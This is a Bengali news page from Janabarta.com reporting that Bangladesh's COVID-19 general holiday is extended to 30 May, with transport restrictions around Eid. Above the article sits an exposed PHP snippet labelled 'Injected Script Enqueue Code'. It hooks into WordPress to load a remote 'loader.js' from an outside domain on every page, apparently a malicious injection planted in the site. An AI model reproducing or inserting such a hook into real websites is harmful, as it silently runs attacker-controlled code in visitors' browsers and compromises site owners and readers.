// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ছুটি বাড়ছে ৩০শে মে পর্যন্ত - Janabarta.com

ছুটি বাড়ছে ৩০শে মে পর্যন্ত

নিজস্ব প্রতিবেদকঃ করোনা ভাইরাস সংক্রমণ ঠেকাতে সাধারণ ছুটির মেয়াদ আরেক দফা বাড়ানোর সিদ্ধান্ত নিয়েছে সরকার। আগামী ১৭ই মে থেকে আরো ১৪ দিন বাড়িয়ে ৩০শে মে পর্যন্ত ছুটি ঘোষণা করা হচ্ছে। আগামীকাল বৃহস্পতিবার এ বিষয়ে প্রজ্ঞাপন জারি করা হবে। আজ বুধবার এ তথ্য নিশ্চিত করেন জনপ্রশাসন প্রতিমন্ত্রী ফরহাদ হোসেন।

তিনি জানান, সাধারণ ছুটির এ সময়টাতে গণপরিবহন চলবে না। এমন কি ঈদের আগের ৪ দিন এবং পরের ২ দিন মোট ৭ দিন যানবাহন চলাচল কঠোরতা অবলম্বন করা হবে। ছুটির ক্যালেন্ডার অনুযায়ী, ২১শে মে শবে কদরের ছুটি রয়েছে, ২২শে মে এবং ২৩শে মে সাপ্তাহিক ছুটি এবং ২৪ থেকে ২৬শে মে পর্যন্ত ঈদের ছুটি রয়েছে।

এর আগে করোনার সংক্রমণ রোধে সরকারি-বেসরকারি অফিস সমূহ প্রথম দফায় ২৬শে মার্চ থেকে ৪ঠা এপ্রিল পর্যন্ত ছুটি ঘোষণা করা হয়।পরবর্তীতে তা কয়েক ধাপে ১৭ই মে পর্যন্ত বর্ধিত করা হয়েছিল। সাধারণ ছুটির কারণে সড়ক, নৌ, রেল ও বিমান পথে যাত্রীবাহী যান চলাচল বন্ধ রয়েছে। তবে এরই মধ্যে গত ১০ই মে থেকে শর্তসাপেক্ষে দোকানপাট খুলে দেয়ার অনুমতি দেয়া হয়েছে। গার্মেন্ট কারখানা এবং কিছু অফিসও এরই মধ্যে খুলেছে।

এদিকে দেশে করোনা ভাইরাসের সংক্রমণ দিন দিন বাড়ছে। সর্বশেষ তিন দিনেই আক্রান্তের সংখ্যা ছাড়িয়েছে তিন হাজার। একইসঙ্গে বাড়ছে মৃতের সংখ্যাও। এ অবস্থায় সরকার ঘোষিত সাধারণ ছুটির মেয়াদ আরো একদফা বাড়তে যাচ্ছে।